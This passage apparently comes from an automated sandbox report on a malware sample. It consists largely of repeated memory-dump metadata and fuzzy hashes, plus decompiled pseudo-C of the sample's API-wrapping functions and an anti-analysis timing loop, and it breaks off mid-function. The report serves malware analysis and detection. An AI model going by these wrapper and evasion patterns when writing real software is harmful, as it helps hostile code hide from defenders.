                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E004088C0(intOrPtr _a4) {
                                                              				intOrPtr _v8;
                                                              				char _v24;
                                                              				char _v284;
                                                              				char _v804;
                                                              				char _v840;
                                                              				void* _t24;
                                                              				void* _t31;
                                                              				void* _t33;
                                                              				void* _t34;
                                                              				void* _t39;
                                                              				void* _t50;
                                                              				intOrPtr _t52;
                                                              				void* _t53;
                                                              				void* _t54;
                                                              				void* _t55;
                                                              				void* _t56;
                                                              
                                                              				_t52 = _a4;
                                                              				_t39 = 0; // executed
                                                              				_t24 = E00406E20(_t52,  &_v24); // executed
                                                              				_t54 = _t53 + 8;
                                                              				if(_t24 != 0) {
                                                              					E00407030( &_v24,  &_v840);
                                                              					_t55 = _t54 + 8;
                                                              					do {
                                                              						E0041A0E0( &_v284, 0x104);
                                                              						E0041A750( &_v284,  &_v804);
                                                              						_t56 = _t55 + 0x10;
                                                              						_t50 = 0x4f;
                                                              						while(1) {
                                                              							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
                                                              							_t56 = _t56 + 0x10;
                                                              							if(_t31 != 0) {
                                                              								break;
                                                              							}
                                                              							_t50 = _t50 + 1;
                                                              							if(_t50 <= 0x62) {
                                                              								continue;
                                                              							} else {
                                                              							}
                                                              							goto L8;
                                                              						}
                                                              						_t9 = _t52 + 0x14; // 0xffffe1b5
                                                              						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                              						_t39 = 1;
                                                              						L8:
                                                              						_t33 = E00407060( &_v24,  &_v840);
                                                              						_t55 = _t56 + 8;
                                                              					} while (_t33 != 0 && _t39 == 0);
                                                              					_t34 = E004070E0(_t52,  &_v24); // executed
                                                              					if(_t39 == 0) {
                                                              						asm("rdtsc");
                                                              						asm("rdtsc");
                                                              						_v8 = _t34 - 0 + _t34;
                                                              						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                              					}
                                                              					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                              					_t20 = _t52 + 0x31; // 0x5608758b
                                                              					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                              					return 1;
                                                              				} else {
                                                              					return _t24;
                                                              				}
                                                              			}


                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                              • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                                                              • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                              • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                              				void* _t10;
                                                              				void* _t15;
                                                              
                                                              				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                              				_t6 =  &_a8; // 0x413526
                                                              				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: &5A
                                                              • API String ID: 1279760036-1617645808
                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 48%
                                                              			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                                              				char _v67;
                                                              				char _v68;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t12;
                                                              				intOrPtr* _t13;
                                                              				int _t14;
                                                              				void* _t20;
                                                              				long _t21;
                                                              				void* _t24;
                                                              				intOrPtr* _t25;
                                                              				void* _t26;
                                                              				void* _t30;
                                                              
                                                              				_t30 = __eflags;
                                                              				_v68 = 0;
                                                              				E0041A130( &_v67, 0, 0x3f);
                                                              				E0041AD10( &_v68, 3);
                                                              				_t24 = _a4 + 0x1c;
                                                              				_t12 = E00409B30(_t30, _t24,  &_v68); // executed
                                                              				_push(0xc4e7b6d6);
                                                              				_push(0);
                                                              				_push(0);
                                                              				_push(_t12);
                                                              				_push(_t24);
                                                              				_t13 = E00413E40(_t12, _t20, _t24);
                                                              				_t25 = _t13;
                                                              				if(_t25 != 0) {
                                                              					_push(_t20);
                                                              					_t21 = _a8;
                                                              					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                              					_t32 = _t14;
                                                              					if(_t14 == 0) {
                                                              						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                              					}
                                                              					return _t14;
                                                              				}
                                                              				return _t13;
                                                              			}
                                                              0x00407280 0x0040728f 0x00407293 0x0040729e 0x004072aa 0x004072ae 0x004072b3 0x004072b8 0x004072ba 0x004072bc 0x004072bd 0x004072be 0x004072c3 0x004072ca 0x004072cc 0x004072cd 0x004072da 0x004072dc 0x004072de 0x004072fb 0x004072fb 0x00000000 0x004072fd 0x00407302

                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                              • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                                                              • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                              • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 44%
                                                              			E00418A31(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                              				int _t12;
                                                              
                                                              				asm("lds ecx, [esi+0x68]");
                                                              				asm("lodsb");
                                                              				asm("sbb [edi+ecx*4-0x31], edx");
                                                              				asm("lahf");
                                                              				_t17 =  *(__eax - 0xe9) * 0x8b553874;
                                                              				_t9 = _a4;
                                                              				E004191D0(_t17, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
                                                              				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                              				return _t12;
                                                              			}
                                                              0x00418a31 0x00418a34 0x00418a35 0x00418a3b 0x00418a3c 0x00418a43 0x00418a5a 0x00418a70 0x00418a74

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 904817a693f641618be4d61275ebfff9c4544b176c0127c6cfabfde503dd64b5
                                                              • Instruction ID: a0951bfc263cfa7daba098335b044920feaa6d4bce2c7a3e484e5f7442c6d165
                                                              • Opcode Fuzzy Hash: 904817a693f641618be4d61275ebfff9c4544b176c0127c6cfabfde503dd64b5
                                                              • Instruction Fuzzy Hash: D7F0A0B2240204AFDB14DF54DC84EE77BA9EF88350F018659F949A7250C634E865CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 64%
                                                              			E004188D2(void* __eax, void* __fp0, void* _a4, long _a8, void* _a12) {
                                                              				intOrPtr _v0;
                                                              				char _t13;
                                                              				void* _t18;
                                                              
                                                              				asm("in al, dx");
                                                              				_push(0xf06899fb);
                                                              				_t10 = _v0;
                                                              				_t5 = _t10 + 0xc74; // 0xc74
                                                              				E004191D0(_t18, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                                              				_t13 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                              				return _t13;
                                                              			}
                                                              0x004188d2 0x004188d3 0x004188e3 0x004188ef 0x004188f7 0x0041890d 0x00418911

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: e4dd4612c369b0fe6de77d021347657b8659fe979e6f89537cc2ffdf76105970
                                                              • Instruction ID: 4dcc4c4ced3ae352b1eb8cd54aaf07ae5679c31f6a37232146f39f5fbef456e5
                                                              • Opcode Fuzzy Hash: e4dd4612c369b0fe6de77d021347657b8659fe979e6f89537cc2ffdf76105970
                                                              • Instruction Fuzzy Hash: FFE065B5200205ABDB18DF99CC49EA737ACAF88358F164259FD08AB241C630E800CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                              				char _t10;
                                                              				void* _t15;
                                                              
                                                              				_t3 = _a4 + 0xc74; // 0xc74
                                                              				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}
                                                              0x004188ef 0x004188f7 0x0041890d 0x00418911

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                              				int _t10;
                                                              				void* _t15;
                                                              
                                                              				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}
                                                              0x00418a5a 0x00418a70 0x00418a74

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00418920(intOrPtr _a4, int _a8) {
                                                              				void* _t10;
                                                              
                                                              				_t5 = _a4;
                                                              				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                              				ExitProcess(_a8);
                                                              			}
                                                              0x00418923 0x0041893a 0x00418948

                                                              APIs
                                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418948
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff5f6ea8f9d5286be0fa523bdbb8ac7889244bfe667bbf848e24d463fadb5b6a
                                                              • Instruction ID: ecf292b78efb5c37a23301c63ee63db3456e338ba391b94020ef8c9ee6cf5a09
                                                              • Opcode Fuzzy Hash: ff5f6ea8f9d5286be0fa523bdbb8ac7889244bfe667bbf848e24d463fadb5b6a
                                                              • Instruction Fuzzy Hash: A5014973D16508DBE320AE59AC52BFBF778CBD2715F0402EBEC4457201E769C8A182D5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                              • Instruction ID: 74225f1b926ed813f3523f00cfe4cc92e58d57113e7a9348c90c06ea08c7f1e2
                                                              • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                              • Instruction Fuzzy Hash: 63F0C235724159ABDB48EB189DD2F6A33E5EB94300F55C03DED4DC7252E631DD408790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 28%
                                                              			E0041566A(void* __eax, void* __edx, void* __esi) {
                                                              				void* _t4;
                                                              				void* _t5;
                                                              				void* _t13;
                                                              
                                                              				_t4 = _t13;
                                                              				asm("sti");
                                                              				asm("aaa");
                                                              				asm("fstp1 st6");
                                                              				asm("rcr edx, cl");
                                                              				asm("clc");
